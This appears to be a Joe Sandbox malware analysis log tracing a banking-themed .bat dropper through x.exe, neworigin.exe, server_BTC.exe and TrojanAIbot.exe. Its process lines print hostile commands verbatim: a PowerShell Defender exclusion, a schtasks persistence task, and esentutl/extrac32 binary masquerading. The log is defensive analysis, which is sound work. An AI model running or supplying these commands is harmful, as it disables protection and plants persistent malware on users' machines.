Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02AA8670 NtUnmapViewOfSection,	26_2_02AA8670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02AA8400 NtReadVirtualMemory,	26_2_02AA8400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02AA7A2C NtAllocateVirtualMemory,	26_2_02AA7A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02AA7D78 NtWriteVirtualMemory,	26_2_02AA7D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02AA8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	26_2_02AA8D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02AADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	26_2_02AADD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02AA86F7 NtUnmapViewOfSection,	26_2_02AA86F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02AA7A2A NtAllocateVirtualMemory,	26_2_02AA7A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02AADBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	26_2_02AADBB0
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02AADC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	26_2_02AADC8C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02AADC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	26_2_02AADC04
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02AA8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	26_2_02AA8D6E

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02A18788 CreateProcessAsUserW,

4_2_02A18788

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02A020C4	4_2_02A020C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_016BAA42	13_2_016BAA42
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_016BEA80	13_2_016BEA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_016B4A98	13_2_016B4A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_016BDF00	13_2_016BDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_016B3E80	13_2_016B3E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_016B41C8	13_2_016B41C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_016BDF00	13_2_016BDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06DC66E8	13_2_06DC66E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06DC56B8	13_2_06DC56B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06DC7E78	13_2_06DC7E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06DCC2A0	13_2_06DCC2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06DCB32A	13_2_06DCB32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06DC3178	13_2_06DC3178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06DC7798	13_2_06DC7798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06DCE4C0	13_2_06DCE4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06DC5DDF	13_2_06DC5DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06DC2350	13_2_06DC2350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06DC0040	13_2_06DC0040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06DC0007	13_2_06DC0007
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 14_2_030B85B7	14_2_030B85B7
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 14_2_030B85C8	14_2_030B85C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_04EBB490	15_2_04EBB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_04EBB470	15_2_04EBB470
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 19_2_05E5DAAC	19_2_05E5DAAC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 19_2_05E525A8	19_2_05E525A8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 19_2_05E525B8	19_2_05E525B8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 19_2_05E5255F	19_2_05E5255F
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 19_2_05E5E608	19_2_05E5E608
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 19_2_05E51D20	19_2_05E51D20
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 19_2_06773360	19_2_06773360
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02A920C4	26_2_02A920C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_0101AA48	28_2_0101AA48
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_0101EA80	28_2_0101EA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_01014A98	28_2_01014A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_0101DE38	28_2_0101DE38
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_01013E80	28_2_01013E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_010141C8	28_2_010141C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_0101DE38	28_2_0101DE38
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_01012FFC	28_2_01012FFC
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_069147CC	28_2_069147CC
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_06911B48	28_2_06911B48
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_069167F1	28_2_069167F1
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_06911F10	28_2_06911F10
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_06915AC0	28_2_06915AC0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_06915A41	28_2_06915A41
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_06915B08	28_2_06915B08
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_069256B8	28_2_069256B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_069266E8	28_2_069266E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_06927E78	28_2_06927E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_0692C2A0	28_2_0692C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_0692B338	28_2_0692B338
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_06922360	28_2_06922360
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_06927798	28_2_06927798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_0692E4C0	28_2_0692E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_06925DF0	28_2_06925DF0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_06920040	28_2_06920040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 28_2_06920025	28_2_06920025

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02AA894C appears 50 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02A946D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02A94860 appears 683 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02A1894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02A046D4 appears 244 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02A189D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02A04500 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02A04860 appears 949 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02A044DC appears 74 times

Source: 13.0.neworigin.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: armsvc.exe.12.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: armsvc.exe.12.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winBAT@54/27@5/3

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02A07FD2 GetDiskFreeSpaceA,

4_2_02A07FD2

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02A16DC8 CoCreateInstance,

4_2_02A16DC8

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4132:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-924cae54405a0e313d78ffaf-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-924cae54405a0e31-inf
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\CAB02848.TMP

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat

ReversingLabs: Detection: 23%

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_12-258

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp692E.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown	Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp692E.tmp.cmd""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apllllphllelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
